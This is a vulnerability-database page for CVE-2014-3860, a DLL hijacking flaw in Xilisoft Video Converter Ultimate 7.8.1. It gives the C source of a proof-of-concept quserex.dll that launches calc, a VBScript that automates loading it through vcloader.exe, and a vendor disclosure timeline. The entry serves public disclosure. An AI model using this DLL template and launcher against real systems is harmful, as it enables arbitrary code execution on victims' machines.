Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormOsanda MalithPACKETSTORM:126882
HistoryJun 02, 2014 - 12:00 a.m.

Xilisoft Video Converter Ultimate 7.8.1 build-20140505 DLL Hijacking

2014-06-0200:00:00
Osanda Malith
packetstormsecurity.com
26

0.001 Low

EPSS

Percentile

39.5%

JSON
`/*  
* Title: Xilisoft Video Converter Ultimate Dll Hijacking Exploit (quserex.dll)  
* Version: 7.8.1 build-20140505 (Previous versions might be vulnerable)  
* Tested on: Windows XP SP2 en  
* Vendor: http://www.xilisoft.com/  
* Software Link: http://www.xilisoft.com/webapp/downloader.php?product_code=x-video-converter-ultimate7  
* Exploit-Author: Osanda Malith Jayathissa  
* /!\ Author is not responsible for any damage you cause  
* Use this material for educational purposes only  
* Twitter: @OsandaMalith  
* CVE: CVE-2014-3860  
*/   
/*  
Vulnerable Executables:  
1. vcloader.exe  
2. vc.exe  
3. vc_buy.exe  
*/  
#include <windows.h>  
int pwned()  
{  
WinExec("calc", 0);  
exit(0);  
return 0;  
}  
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)  
{  
pwned();  
return 0;  
}  
  
/*  
As this application as no extensions associated we have to manually a open a file with this application.  
So we can automate this process by writting something like this ;) Place the DLL and this script in the  
same location. Once the victim runs this script the DLL will be hijacked.  
  
msg=MsgBox ("Automated POC" & chr(13) & "Coded by Osanda Malith", 64, "Xilisoft Video Converter Ultimate Dll Hijacking Exploit")  
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("new.jpg",2,true)  
objFileToWrite.WriteLine("POC by Osanda Malith :D")  
objFileToWrite.Close  
file = "new.jpg"  
Set oShell = CreateObject("WScript.Shell")  
' Path to Xilisoft Video Converter  
oShell.Run """%ProgramFiles%\Xilisoft\Video Converter Ultimate\vcloader.exe """ & file  
*/  
/* Disclosure Timeline  
2014-04-20 : Contacted the vendor  
2014-04-23 : Contacted again as I did not recieve any reply  
2014-04-24 : Recieved a response saying that it was forwarded to technicians   
2014-05-16 : Contacted again since there is was reply  
2014-05-20 : Recieved a response saying that they cannot reproduce  
2014-06-01 : Contacted MITRE  
2014-06-02 : Public disclosure */  
//EOF  
`

Related

cve 1
nvd 1
zdt 1
prion 1
cvelist 1
cve
cve
CVE-2014-3860
2020-02-12 18:15:10
nvd
nvd
CVE-2014-3860
2020-02-12 18:15:10
zdt
zdt
Xilisoft Video Converter Ultimate Dll Hijacking Exploit (quserex.dll)
2014-06-03 00:00:00
prion
prion
Design/Logic Flaw
2020-02-12 18:15:00
cvelist
cvelist
CVE-2014-3860
2020-02-12 17:56:53

0.001 Low

EPSS

Percentile

39.5%

JSON
Related for PACKETSTORM:126882
cve1nvd1zdt1prion1cvelist1